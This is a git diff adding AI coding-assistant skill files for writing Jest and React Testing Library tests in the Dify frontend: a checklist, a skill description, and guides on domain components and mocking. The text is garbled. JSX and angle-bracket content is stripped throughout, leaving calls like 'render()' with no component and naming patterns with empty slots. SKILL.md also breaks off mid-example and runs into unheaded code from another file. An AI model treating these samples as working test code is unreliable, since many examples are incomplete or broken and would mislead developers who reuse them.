diff --git a/.claude/skills/frontend-testing/CHECKLIST.md b/.claude/skills/frontend-testing/CHECKLIST.md new file mode 100644 index 0000000000..b960067264 --- /dev/null +++ b/.claude/skills/frontend-testing/CHECKLIST.md @@ -0,0 +1,205 @@ +# Test Generation Checklist + +Use this checklist when generating or reviewing tests for Dify frontend components. + +## Pre-Generation + +- [ ] Read the component source code completely +- [ ] Identify component type (component, hook, utility, page) +- [ ] Run `pnpm analyze-component ` if available +- [ ] Note complexity score and features detected +- [ ] Check for existing tests in the same directory +- [ ] **Identify ALL files in the directory** that need testing (not just index) + +## Testing Strategy + +### ⚠️ Incremental Workflow (CRITICAL for Multi-File) + +- [ ] **NEVER generate all tests at once** - process one file at a time +- [ ] Order files by complexity: utilities → hooks → simple → complex → integration +- [ ] Create a todo list to track progress before starting +- [ ] For EACH file: write → run test → verify pass → then next +- [ ] **DO NOT proceed** to next file until current one passes + +### Path-Level Coverage + +- [ ] **Test ALL files** in the assigned directory/path +- [ ] List all components, hooks, utilities that need coverage +- [ ] Decide: single spec file (integration) or multiple spec files (unit) + +### Complexity Assessment + +- [ ] Run `pnpm analyze-component ` for complexity score +- [ ] **Complexity > 50**: Consider refactoring before testing +- [ ] **500+ lines**: Consider splitting before testing +- [ ] **30-50 complexity**: Use multiple describe blocks, organized structure + +### Integration vs Mocking + +- [ ] **DO NOT mock base components** (`Loading`, `Button`, `Tooltip`, etc.) 
+- [ ] Import real project components instead of mocking +- [ ] Only mock: API calls, complex context providers, third-party libs with side effects +- [ ] Prefer integration testing when using single spec file + +## Required Test Sections + +### All Components MUST Have + +- [ ] **Rendering tests** - Component renders without crashing +- [ ] **Props tests** - Required props, optional props, default values +- [ ] **Edge cases** - null, undefined, empty values, boundaries + +### Conditional Sections (Add When Feature Present) + +| Feature | Add Tests For | +|---------|---------------| +| `useState` | Initial state, transitions, cleanup | +| `useEffect` | Execution, dependencies, cleanup | +| Event handlers | onClick, onChange, onSubmit, keyboard | +| API calls | Loading, success, error states | +| Routing | Navigation, params, query strings | +| `useCallback`/`useMemo` | Referential equality | +| Context | Provider values, consumer behavior | +| Forms | Validation, submission, error display | + +## Code Quality Checklist + +### Structure + +- [ ] Uses `describe` blocks to group related tests +- [ ] Test names follow `should when ` pattern +- [ ] AAA pattern (Arrange-Act-Assert) is clear +- [ ] Comments explain complex test scenarios + +### Mocks + +- [ ] **DO NOT mock base components** (`@/app/components/base/*`) +- [ ] `jest.clearAllMocks()` in `beforeEach` (not `afterEach`) +- [ ] Shared mock state reset in `beforeEach` +- [ ] i18n uses shared mock (auto-loaded); only override locally for custom translations +- [ ] Router mocks match actual Next.js API +- [ ] Mocks reflect actual component conditional behavior +- [ ] Only mock: API services, complex context providers, third-party libs + +### Queries + +- [ ] Prefer semantic queries (`getByRole`, `getByLabelText`) +- [ ] Use `queryBy*` for absence assertions +- [ ] Use `findBy*` for async elements +- [ ] `getByTestId` only as last resort + +### Async + +- [ ] All async tests use `async/await` +- [ ] `waitFor` wraps 
async assertions +- [ ] Fake timers properly setup/teardown +- [ ] No floating promises + +### TypeScript + +- [ ] No `any` types without justification +- [ ] Mock data uses actual types from source +- [ ] Factory functions have proper return types + +## Coverage Goals (Per File) + +For the current file being tested: + +- [ ] 100% function coverage +- [ ] 100% statement coverage +- [ ] >95% branch coverage +- [ ] >95% line coverage + +## Post-Generation (Per File) + +**Run these checks after EACH test file, not just at the end:** + +- [ ] Run `pnpm test -- path/to/file.spec.tsx` - **MUST PASS before next file** +- [ ] Fix any failures immediately +- [ ] Mark file as complete in todo list +- [ ] Only then proceed to next file + +### After All Files Complete + +- [ ] Run full directory test: `pnpm test -- path/to/directory/` +- [ ] Check coverage report: `pnpm test -- --coverage` +- [ ] Run `pnpm lint:fix` on all test files +- [ ] Run `pnpm type-check:tsgo` + +## Common Issues to Watch + +### False Positives + +```typescript +// ❌ Mock doesn't match actual behavior +jest.mock('./Component', () => () =>
<div>Mocked</div>
) + +// ✅ Mock matches actual conditional logic +jest.mock('./Component', () => ({ isOpen }: any) => + isOpen ?
<div>Content</div>
: null +) +``` + +### State Leakage + +```typescript +// ❌ Shared state not reset +let mockState = false +jest.mock('./useHook', () => () => mockState) + +// ✅ Reset in beforeEach +beforeEach(() => { + mockState = false +}) +``` + +### Async Race Conditions + +```typescript +// ❌ Not awaited +it('loads data', () => { + render() + expect(screen.getByText('Data')).toBeInTheDocument() +}) + +// ✅ Properly awaited +it('loads data', async () => { + render() + await waitFor(() => { + expect(screen.getByText('Data')).toBeInTheDocument() + }) +}) +``` + +### Missing Edge Cases + +Always test these scenarios: + +- `null` / `undefined` inputs +- Empty strings / arrays / objects +- Boundary values (0, -1, MAX_INT) +- Error states +- Loading states +- Disabled states + +## Quick Commands + +```bash +# Run specific test +pnpm test -- path/to/file.spec.tsx + +# Run with coverage +pnpm test -- --coverage path/to/file.spec.tsx + +# Watch mode +pnpm test -- --watch path/to/file.spec.tsx + +# Update snapshots (use sparingly) +pnpm test -- -u path/to/file.spec.tsx + +# Analyze component +pnpm analyze-component path/to/component.tsx + +# Review existing test +pnpm analyze-component path/to/component.tsx --review +``` diff --git a/.claude/skills/frontend-testing/SKILL.md b/.claude/skills/frontend-testing/SKILL.md new file mode 100644 index 0000000000..06cb672141 --- /dev/null +++ b/.claude/skills/frontend-testing/SKILL.md @@ -0,0 +1,321 @@ +--- +name: Dify Frontend Testing +description: Generate Jest + React Testing Library tests for Dify frontend components, hooks, and utilities. Triggers on testing, spec files, coverage, Jest, RTL, unit tests, integration tests, or write/review test requests. +--- + +# Dify Frontend Testing Skill + +This skill enables Claude to generate high-quality, comprehensive frontend tests for the Dify project following established conventions and best practices. + +> **⚠️ Authoritative Source**: This skill is derived from `web/testing/testing.md`. 
When in doubt, always refer to that document as the canonical specification. + +## When to Apply This Skill + +Apply this skill when the user: + +- Asks to **write tests** for a component, hook, or utility +- Asks to **review existing tests** for completeness +- Mentions **Jest**, **React Testing Library**, **RTL**, or **spec files** +- Requests **test coverage** improvement +- Uses `pnpm analyze-component` output as context +- Mentions **testing**, **unit tests**, or **integration tests** for frontend code +- Wants to understand **testing patterns** in the Dify codebase + +**Do NOT apply** when: + +- User is asking about backend/API tests (Python/pytest) +- User is asking about E2E tests (Playwright/Cypress) +- User is only asking conceptual questions without code context + +## Quick Reference + +### Tech Stack + +| Tool | Version | Purpose | +|------|---------|---------| +| Jest | 29.7 | Test runner | +| React Testing Library | 16.0 | Component testing | +| happy-dom | - | Test environment | +| nock | 14.0 | HTTP mocking | +| TypeScript | 5.x | Type safety | + +### Key Commands + +```bash +# Run all tests +pnpm test + +# Watch mode +pnpm test -- --watch + +# Run specific file +pnpm test -- path/to/file.spec.tsx + +# Generate coverage report +pnpm test -- --coverage + +# Analyze component complexity +pnpm analyze-component + +# Review existing test +pnpm analyze-component --review +``` + +### File Naming + +- Test files: `ComponentName.spec.tsx` (same directory as component) +- Integration tests: `web/__tests__/` directory + +## Test Structure Template + +```typescript +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import Component from './index' + +// ✅ Import real project components (DO NOT mock these) +// import Loading from '@/app/components/base/loading' +// import { ChildComponent } from './child-component' + +// ✅ Mock external dependencies only +jest.mock('@/service/api') +jest.mock('next/navigation', () => ({ + useRouter: () 
=> ({ push: jest.fn() }), + usePathname: () => '/test', +})) + +// Shared state for mocks (if needed) +let mockSharedState = false + +describe('ComponentName', () => { + beforeEach(() => { + jest.clearAllMocks() // ✅ Reset mocks BEFORE each test + mockSharedState = false // ✅ Reset shared state + }) + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render without crashing', () => { + // Arrange + const props = { title: 'Test' } + + // Act + render() + + // Assert + expect(screen.getByText('Test')).toBeInTheDocument() + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should apply custom className', () => { + render() + expect(screen.getByRole('button')).toHaveClass('custom') + }) + }) + + // User Interactions + describe('User Interactions', () => { + it('should handle click events', () => { + const handleClick = jest.fn() + render() + + fireEvent.click(screen.getByRole('button')) + + expect(handleClick).toHaveBeenCalledTimes(1) + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle null data', () => { + render() + expect(screen.getByText(/no data/i)).toBeInTheDocument() + }) + + it('should handle empty array', () => { + render() + expect(screen.getByText(/empty/i)).toBeInTheDocument() + }) + }) +}) +``` + +## Testing Workflow (CRITICAL) + +### ⚠️ Incremental Approach Required + +**NEVER generate all test files at once.** For complex components or multi-file directories: + +1. **Analyze & Plan**: List all files, order by complexity (simple → complex) +1. **Process ONE at a time**: Write test → Run test → Fix if needed → Next +1. **Verify before proceeding**: Do NOT continue to next file until current passes + +``` +For each file: + ┌────────────────────────────────────────┐ + │ 1. Write test │ + │ 2. Run: pnpm test -- .spec.tsx │ + │ 3. PASS? → Mark complete, next file │ + │ FAIL? 
→ Fix first, then continue │ + └────────────────────────────────────────┘ +``` + +### Complexity-Based Order + +Process in this order for multi-file testing: + +1. 🟢 Utility functions (simplest) +1. 🟢 Custom hooks +1. 🟡 Simple components (presentational) +1. 🟡 Medium components (state, effects) +1. 🔴 Complex components (API, routing) +1. 🔴 Integration tests (index files - last) + +### When to Refactor First + +- **Complexity > 50**: Break into smaller pieces before testing +- **500+ lines**: Consider splitting before testing +- **Many dependencies**: Extract logic into hooks first + +> 📖 See `guides/workflow.md` for complete workflow details and todo list format. + +## Testing Strategy + +### Path-Level Testing (Directory Testing) + +When assigned to test a directory/path, test **ALL content** within that path: + +- Test all components, hooks, utilities in the directory (not just `index` file) +- Use incremental approach: one file at a time, verify each before proceeding +- Goal: 100% coverage of ALL files in the directory + +### Integration Testing First + +**Prefer integration testing** when writing tests for a directory: + +- ✅ **Import real project components** directly (including base components and siblings) +- ✅ **Only mock**: API services (`@/service/*`), `next/navigation`, complex context providers +- ❌ **DO NOT mock** base components (`@/app/components/base/*`) +- ❌ **DO NOT mock** sibling/child components in the same directory + +> See [Test Structure Template](#test-structure-template) for correct import/mock patterns. + +## Core Principles + +### 1. AAA Pattern (Arrange-Act-Assert) + +Every test should clearly separate: + +- **Arrange**: Setup test data and render component +- **Act**: Perform user actions +- **Assert**: Verify expected outcomes + +### 2. 
Black-Box Testing + +- Test observable behavior, not implementation details +- Use semantic queries (getByRole, getByLabelText) +- Avoid testing internal state directly +- **Prefer pattern matching over hardcoded strings** in assertions: + +```typescript +// ❌ Avoid: hardcoded text assertions +expect(screen.getByText('Loading...')).toBeInTheDocument() + +// ✅ Better: role-based queries +expect(screen.getByRole('status')).toBeInTheDocument() + +// ✅ Better: pattern matching +expect(screen.getByText(/loading/i)).toBeInTheDocument() +``` + +### 3. Single Behavior Per Test + +Each test verifies ONE user-observable behavior: + +```typescript +// ✅ Good: One behavior +it('should disable button when loading', () => { + render( + + + ) + + // Focus should cycle within modal + await user.tab() + expect(screen.getByText('First')).toHaveFocus() + + await user.tab() + expect(screen.getByText('Second')).toHaveFocus() + + await user.tab() + expect(screen.getByText('First')).toHaveFocus() // Cycles back + }) +}) +``` + +## Form Testing + +```typescript +describe('LoginForm', () => { + it('should submit valid form', async () => { + const user = userEvent.setup() + const onSubmit = jest.fn() + + render() + + await user.type(screen.getByLabelText(/email/i), 'test@example.com') + await user.type(screen.getByLabelText(/password/i), 'password123') + await user.click(screen.getByRole('button', { name: /sign in/i })) + + expect(onSubmit).toHaveBeenCalledWith({ + email: 'test@example.com', + password: 'password123', + }) + }) + + it('should show validation errors', async () => { + const user = userEvent.setup() + + render() + + // Submit empty form + await user.click(screen.getByRole('button', { name: /sign in/i })) + + expect(screen.getByText(/email is required/i)).toBeInTheDocument() + expect(screen.getByText(/password is required/i)).toBeInTheDocument() + }) + + it('should validate email format', async () => { + const user = userEvent.setup() + + render() + + await 
user.type(screen.getByLabelText(/email/i), 'invalid-email') + await user.click(screen.getByRole('button', { name: /sign in/i })) + + expect(screen.getByText(/invalid email/i)).toBeInTheDocument() + }) + + it('should disable submit button while submitting', async () => { + const user = userEvent.setup() + const onSubmit = jest.fn(() => new Promise(resolve => setTimeout(resolve, 100))) + + render() + + await user.type(screen.getByLabelText(/email/i), 'test@example.com') + await user.type(screen.getByLabelText(/password/i), 'password123') + await user.click(screen.getByRole('button', { name: /sign in/i })) + + expect(screen.getByRole('button', { name: /signing in/i })).toBeDisabled() + + await waitFor(() => { + expect(screen.getByRole('button', { name: /sign in/i })).toBeEnabled() + }) + }) +}) +``` + +## Data-Driven Tests with test.each + +```typescript +describe('StatusBadge', () => { + test.each([ + ['success', 'bg-green-500'], + ['warning', 'bg-yellow-500'], + ['error', 'bg-red-500'], + ['info', 'bg-blue-500'], + ])('should apply correct class for %s status', (status, expectedClass) => { + render() + + expect(screen.getByTestId('status-badge')).toHaveClass(expectedClass) + }) + + test.each([ + { input: null, expected: 'Unknown' }, + { input: undefined, expected: 'Unknown' }, + { input: '', expected: 'Unknown' }, + { input: 'invalid', expected: 'Unknown' }, + ])('should show "Unknown" for invalid input: $input', ({ input, expected }) => { + render() + + expect(screen.getByText(expected)).toBeInTheDocument() + }) +}) +``` + +## Debugging Tips + +```typescript +// Print entire DOM +screen.debug() + +// Print specific element +screen.debug(screen.getByRole('button')) + +// Log testing playground URL +screen.logTestingPlaygroundURL() + +// Pretty print DOM +import { prettyDOM } from '@testing-library/react' +console.log(prettyDOM(screen.getByRole('dialog'))) + +// Check available roles +import { getRoles } from '@testing-library/react' +console.log(getRoles(container)) 
+``` + +## Common Mistakes to Avoid + +### ❌ Don't Use Implementation Details + +```typescript +// Bad - testing implementation +expect(component.state.isOpen).toBe(true) +expect(wrapper.find('.internal-class').length).toBe(1) + +// Good - testing behavior +expect(screen.getByRole('dialog')).toBeInTheDocument() +``` + +### ❌ Don't Forget Cleanup + +```typescript +// Bad - may leak state between tests +it('test 1', () => { + render() +}) + +// Good - cleanup is automatic with RTL, but reset mocks +beforeEach(() => { + jest.clearAllMocks() +}) +``` + +### ❌ Don't Use Exact String Matching (Prefer Black-Box Assertions) + +```typescript +// ❌ Bad - hardcoded strings are brittle +expect(screen.getByText('Submit Form')).toBeInTheDocument() +expect(screen.getByText('Loading...')).toBeInTheDocument() + +// ✅ Good - role-based queries (most semantic) +expect(screen.getByRole('button', { name: /submit/i })).toBeInTheDocument() +expect(screen.getByRole('status')).toBeInTheDocument() + +// ✅ Good - pattern matching (flexible) +expect(screen.getByText(/submit/i)).toBeInTheDocument() +expect(screen.getByText(/loading/i)).toBeInTheDocument() + +// ✅ Good - test behavior, not exact UI text +expect(screen.getByRole('button')).toBeDisabled() +expect(screen.getByRole('alert')).toBeInTheDocument() +``` + +**Why prefer black-box assertions?** + +- Text content may change (i18n, copy updates) +- Role-based queries test accessibility +- Pattern matching is resilient to minor changes +- Tests focus on behavior, not implementation details + +### ❌ Don't Assert on Absence Without Query + +```typescript +// Bad - throws if not found +expect(screen.getByText('Error')).not.toBeInTheDocument() // Error! 
+ +// Good - use queryBy for absence assertions +expect(screen.queryByText('Error')).not.toBeInTheDocument() +``` diff --git a/.claude/skills/frontend-testing/guides/domain-components.md b/.claude/skills/frontend-testing/guides/domain-components.md new file mode 100644 index 0000000000..ed2cc6eb8a --- /dev/null +++ b/.claude/skills/frontend-testing/guides/domain-components.md @@ -0,0 +1,523 @@ +# Domain-Specific Component Testing + +This guide covers testing patterns for Dify's domain-specific components. + +## Workflow Components (`workflow/`) + +Workflow components handle node configuration, data flow, and graph operations. + +### Key Test Areas + +1. **Node Configuration** +1. **Data Validation** +1. **Variable Passing** +1. **Edge Connections** +1. **Error Handling** + +### Example: Node Configuration Panel + +```typescript +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import NodeConfigPanel from './node-config-panel' +import { createMockNode, createMockWorkflowContext } from '@/__mocks__/workflow' + +// Mock workflow context +jest.mock('@/app/components/workflow/hooks', () => ({ + useWorkflowStore: () => mockWorkflowStore, + useNodesInteractions: () => mockNodesInteractions, +})) + +let mockWorkflowStore = { + nodes: [], + edges: [], + updateNode: jest.fn(), +} + +let mockNodesInteractions = { + handleNodeSelect: jest.fn(), + handleNodeDelete: jest.fn(), +} + +describe('NodeConfigPanel', () => { + beforeEach(() => { + jest.clearAllMocks() + mockWorkflowStore = { + nodes: [], + edges: [], + updateNode: jest.fn(), + } + }) + + describe('Node Configuration', () => { + it('should render node type selector', () => { + const node = createMockNode({ type: 'llm' }) + render() + + expect(screen.getByLabelText(/model/i)).toBeInTheDocument() + }) + + it('should update node config on change', async () => { + const user = userEvent.setup() + const node = createMockNode({ type: 'llm' }) + + 
render() + + await user.selectOptions(screen.getByLabelText(/model/i), 'gpt-4') + + expect(mockWorkflowStore.updateNode).toHaveBeenCalledWith( + node.id, + expect.objectContaining({ model: 'gpt-4' }) + ) + }) + }) + + describe('Data Validation', () => { + it('should show error for invalid input', async () => { + const user = userEvent.setup() + const node = createMockNode({ type: 'code' }) + + render() + + // Enter invalid code + const codeInput = screen.getByLabelText(/code/i) + await user.clear(codeInput) + await user.type(codeInput, 'invalid syntax {{{') + + await waitFor(() => { + expect(screen.getByText(/syntax error/i)).toBeInTheDocument() + }) + }) + + it('should validate required fields', async () => { + const node = createMockNode({ type: 'http', data: { url: '' } }) + + render() + + fireEvent.click(screen.getByRole('button', { name: /save/i })) + + await waitFor(() => { + expect(screen.getByText(/url is required/i)).toBeInTheDocument() + }) + }) + }) + + describe('Variable Passing', () => { + it('should display available variables from upstream nodes', () => { + const upstreamNode = createMockNode({ + id: 'node-1', + type: 'start', + data: { outputs: [{ name: 'user_input', type: 'string' }] }, + }) + const currentNode = createMockNode({ + id: 'node-2', + type: 'llm', + }) + + mockWorkflowStore.nodes = [upstreamNode, currentNode] + mockWorkflowStore.edges = [{ source: 'node-1', target: 'node-2' }] + + render() + + // Variable selector should show upstream variables + fireEvent.click(screen.getByRole('button', { name: /add variable/i })) + + expect(screen.getByText('user_input')).toBeInTheDocument() + }) + + it('should insert variable into prompt template', async () => { + const user = userEvent.setup() + const node = createMockNode({ type: 'llm' }) + + render() + + // Click variable button + await user.click(screen.getByRole('button', { name: /insert variable/i })) + await user.click(screen.getByText('user_input')) + + const promptInput = 
screen.getByLabelText(/prompt/i) + expect(promptInput).toHaveValue(expect.stringContaining('{{user_input}}')) + }) + }) +}) +``` + +## Dataset Components (`dataset/`) + +Dataset components handle file uploads, data display, and search/filter operations. + +### Key Test Areas + +1. **File Upload** +1. **File Type Validation** +1. **Pagination** +1. **Search & Filtering** +1. **Data Format Handling** + +### Example: Document Uploader + +```typescript +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import DocumentUploader from './document-uploader' + +jest.mock('@/service/datasets', () => ({ + uploadDocument: jest.fn(), + parseDocument: jest.fn(), +})) + +import * as datasetService from '@/service/datasets' +const mockedService = datasetService as jest.Mocked + +describe('DocumentUploader', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('File Upload', () => { + it('should accept valid file types', async () => { + const user = userEvent.setup() + const onUpload = jest.fn() + mockedService.uploadDocument.mockResolvedValue({ id: 'doc-1' }) + + render() + + const file = new File(['content'], 'test.pdf', { type: 'application/pdf' }) + const input = screen.getByLabelText(/upload/i) + + await user.upload(input, file) + + await waitFor(() => { + expect(mockedService.uploadDocument).toHaveBeenCalledWith( + expect.any(FormData) + ) + }) + }) + + it('should reject invalid file types', async () => { + const user = userEvent.setup() + + render() + + const file = new File(['content'], 'test.exe', { type: 'application/x-msdownload' }) + const input = screen.getByLabelText(/upload/i) + + await user.upload(input, file) + + expect(screen.getByText(/unsupported file type/i)).toBeInTheDocument() + expect(mockedService.uploadDocument).not.toHaveBeenCalled() + }) + + it('should show upload progress', async () => { + const user = userEvent.setup() + + // Mock upload with progress + 
mockedService.uploadDocument.mockImplementation(() => { + return new Promise((resolve) => { + setTimeout(() => resolve({ id: 'doc-1' }), 100) + }) + }) + + render() + + const file = new File(['content'], 'test.pdf', { type: 'application/pdf' }) + await user.upload(screen.getByLabelText(/upload/i), file) + + expect(screen.getByRole('progressbar')).toBeInTheDocument() + + await waitFor(() => { + expect(screen.queryByRole('progressbar')).not.toBeInTheDocument() + }) + }) + }) + + describe('Error Handling', () => { + it('should handle upload failure', async () => { + const user = userEvent.setup() + mockedService.uploadDocument.mockRejectedValue(new Error('Upload failed')) + + render() + + const file = new File(['content'], 'test.pdf', { type: 'application/pdf' }) + await user.upload(screen.getByLabelText(/upload/i), file) + + await waitFor(() => { + expect(screen.getByText(/upload failed/i)).toBeInTheDocument() + }) + }) + + it('should allow retry after failure', async () => { + const user = userEvent.setup() + mockedService.uploadDocument + .mockRejectedValueOnce(new Error('Network error')) + .mockResolvedValueOnce({ id: 'doc-1' }) + + render() + + const file = new File(['content'], 'test.pdf', { type: 'application/pdf' }) + await user.upload(screen.getByLabelText(/upload/i), file) + + await waitFor(() => { + expect(screen.getByRole('button', { name: /retry/i })).toBeInTheDocument() + }) + + await user.click(screen.getByRole('button', { name: /retry/i })) + + await waitFor(() => { + expect(screen.getByText(/uploaded successfully/i)).toBeInTheDocument() + }) + }) + }) +}) +``` + +### Example: Document List with Pagination + +```typescript +describe('DocumentList', () => { + describe('Pagination', () => { + it('should load first page on mount', async () => { + mockedService.getDocuments.mockResolvedValue({ + data: [{ id: '1', name: 'Doc 1' }], + total: 50, + page: 1, + pageSize: 10, + }) + + render() + + await waitFor(() => { + expect(screen.getByText('Doc 
1')).toBeInTheDocument() + }) + + expect(mockedService.getDocuments).toHaveBeenCalledWith('ds-1', { page: 1 }) + }) + + it('should navigate to next page', async () => { + const user = userEvent.setup() + mockedService.getDocuments.mockResolvedValue({ + data: [{ id: '1', name: 'Doc 1' }], + total: 50, + page: 1, + pageSize: 10, + }) + + render() + + await waitFor(() => { + expect(screen.getByText('Doc 1')).toBeInTheDocument() + }) + + mockedService.getDocuments.mockResolvedValue({ + data: [{ id: '11', name: 'Doc 11' }], + total: 50, + page: 2, + pageSize: 10, + }) + + await user.click(screen.getByRole('button', { name: /next/i })) + + await waitFor(() => { + expect(screen.getByText('Doc 11')).toBeInTheDocument() + }) + }) + }) + + describe('Search & Filtering', () => { + it('should filter by search query', async () => { + const user = userEvent.setup() + jest.useFakeTimers() + + render() + + await user.type(screen.getByPlaceholderText(/search/i), 'test query') + + // Debounce + jest.advanceTimersByTime(300) + + await waitFor(() => { + expect(mockedService.getDocuments).toHaveBeenCalledWith( + 'ds-1', + expect.objectContaining({ search: 'test query' }) + ) + }) + + jest.useRealTimers() + }) + }) +}) +``` + +## Configuration Components (`app/configuration/`, `config/`) + +Configuration components handle forms, validation, and data persistence. + +### Key Test Areas + +1. **Form Validation** +1. **Save/Reset** +1. **Required vs Optional Fields** +1. **Configuration Persistence** +1. 
**Error Feedback** + +### Example: App Configuration Form + +```typescript +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import AppConfigForm from './app-config-form' + +jest.mock('@/service/apps', () => ({ + updateAppConfig: jest.fn(), + getAppConfig: jest.fn(), +})) + +import * as appService from '@/service/apps' +const mockedService = appService as jest.Mocked + +describe('AppConfigForm', () => { + const defaultConfig = { + name: 'My App', + description: '', + icon: 'default', + openingStatement: '', + } + + beforeEach(() => { + jest.clearAllMocks() + mockedService.getAppConfig.mockResolvedValue(defaultConfig) + }) + + describe('Form Validation', () => { + it('should require app name', async () => { + const user = userEvent.setup() + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + // Clear name field + await user.clear(screen.getByLabelText(/name/i)) + await user.click(screen.getByRole('button', { name: /save/i })) + + expect(screen.getByText(/name is required/i)).toBeInTheDocument() + expect(mockedService.updateAppConfig).not.toHaveBeenCalled() + }) + + it('should validate name length', async () => { + const user = userEvent.setup() + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toBeInTheDocument() + }) + + // Enter very long name + await user.clear(screen.getByLabelText(/name/i)) + await user.type(screen.getByLabelText(/name/i), 'a'.repeat(101)) + + expect(screen.getByText(/name must be less than 100 characters/i)).toBeInTheDocument() + }) + + it('should allow empty optional fields', async () => { + const user = userEvent.setup() + mockedService.updateAppConfig.mockResolvedValue({ success: true }) + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + // Leave description empty (optional) + await 
user.click(screen.getByRole('button', { name: /save/i })) + + await waitFor(() => { + expect(mockedService.updateAppConfig).toHaveBeenCalled() + }) + }) + }) + + describe('Save/Reset Functionality', () => { + it('should save configuration', async () => { + const user = userEvent.setup() + mockedService.updateAppConfig.mockResolvedValue({ success: true }) + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + await user.clear(screen.getByLabelText(/name/i)) + await user.type(screen.getByLabelText(/name/i), 'Updated App') + await user.click(screen.getByRole('button', { name: /save/i })) + + await waitFor(() => { + expect(mockedService.updateAppConfig).toHaveBeenCalledWith( + 'app-1', + expect.objectContaining({ name: 'Updated App' }) + ) + }) + + expect(screen.getByText(/saved successfully/i)).toBeInTheDocument() + }) + + it('should reset to default values', async () => { + const user = userEvent.setup() + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + // Make changes + await user.clear(screen.getByLabelText(/name/i)) + await user.type(screen.getByLabelText(/name/i), 'Changed Name') + + // Reset + await user.click(screen.getByRole('button', { name: /reset/i })) + + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + it('should show unsaved changes warning', async () => { + const user = userEvent.setup() + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + // Make changes + await user.type(screen.getByLabelText(/name/i), ' Updated') + + expect(screen.getByText(/unsaved changes/i)).toBeInTheDocument() + }) + }) + + describe('Error Handling', () => { + it('should show error on save failure', async () => { + const user = userEvent.setup() + mockedService.updateAppConfig.mockRejectedValue(new Error('Server error')) + + render() + + await waitFor(() => { + 
expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + await user.click(screen.getByRole('button', { name: /save/i })) + + await waitFor(() => { + expect(screen.getByText(/failed to save/i)).toBeInTheDocument() + }) + }) + }) +}) +``` diff --git a/.claude/skills/frontend-testing/guides/mocking.md b/.claude/skills/frontend-testing/guides/mocking.md new file mode 100644 index 0000000000..bf0bd79690 --- /dev/null +++ b/.claude/skills/frontend-testing/guides/mocking.md @@ -0,0 +1,363 @@ +# Mocking Guide for Dify Frontend Tests + +## ⚠️ Important: What NOT to Mock + +### DO NOT Mock Base Components + +**Never mock components from `@/app/components/base/`** such as: + +- `Loading`, `Spinner` +- `Button`, `Input`, `Select` +- `Tooltip`, `Modal`, `Dropdown` +- `Icon`, `Badge`, `Tag` + +**Why?** + +- Base components will have their own dedicated tests +- Mocking them creates false positives (tests pass but real integration fails) +- Using real components tests actual integration behavior + +```typescript +// ❌ WRONG: Don't mock base components +jest.mock('@/app/components/base/loading', () => () =>
<div>Loading</div>
) +jest.mock('@/app/components/base/button', () => ({ children }: any) => ) + +// ✅ CORRECT: Import and use real base components +import Loading from '@/app/components/base/loading' +import Button from '@/app/components/base/button' +// They will render normally in tests +``` + +### What TO Mock + +Only mock these categories: + +1. **API services** (`@/service/*`) - Network calls +1. **Complex context providers** - When setup is too difficult +1. **Third-party libraries with side effects** - `next/navigation`, external SDKs +1. **i18n** - Always mock to return keys + +## Mock Placement + +| Location | Purpose | +|----------|---------| +| `web/__mocks__/` | Reusable mocks shared across multiple test files | +| Test file | Test-specific mocks, inline with `jest.mock()` | + +## Essential Mocks + +### 1. i18n (Auto-loaded via Shared Mock) + +A shared mock is available at `web/__mocks__/react-i18next.ts` and is auto-loaded by Jest. +**No explicit mock needed** for most tests - it returns translation keys as-is. + +For tests requiring custom translations, override the mock: + +```typescript +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => { + const translations: Record = { + 'my.custom.key': 'Custom translation', + } + return translations[key] || key + }, + }), +})) +``` + +### 2. Next.js Router + +```typescript +const mockPush = jest.fn() +const mockReplace = jest.fn() + +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockPush, + replace: mockReplace, + back: jest.fn(), + prefetch: jest.fn(), + }), + usePathname: () => '/current-path', + useSearchParams: () => new URLSearchParams('?key=value'), +})) + +describe('Component', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + it('should navigate on click', () => { + render() + fireEvent.click(screen.getByRole('button')) + expect(mockPush).toHaveBeenCalledWith('/expected-path') + }) +}) +``` + +### 3. 
Portal Components (with Shared State) + +```typescript +// ⚠️ Important: Use shared state for components that depend on each other +let mockPortalOpenState = false + +jest.mock('@/app/components/base/portal-to-follow-elem', () => ({ + PortalToFollowElem: ({ children, open, ...props }: any) => { + mockPortalOpenState = open || false // Update shared state + return
<div {...props}>{children}</div>
+ }, + PortalToFollowElemContent: ({ children }: any) => { + // ✅ Matches actual: returns null when portal is closed + if (!mockPortalOpenState) return null + return
<div>{children}</div>
+ }, + PortalToFollowElemTrigger: ({ children }: any) => ( +
<div>{children}</div>
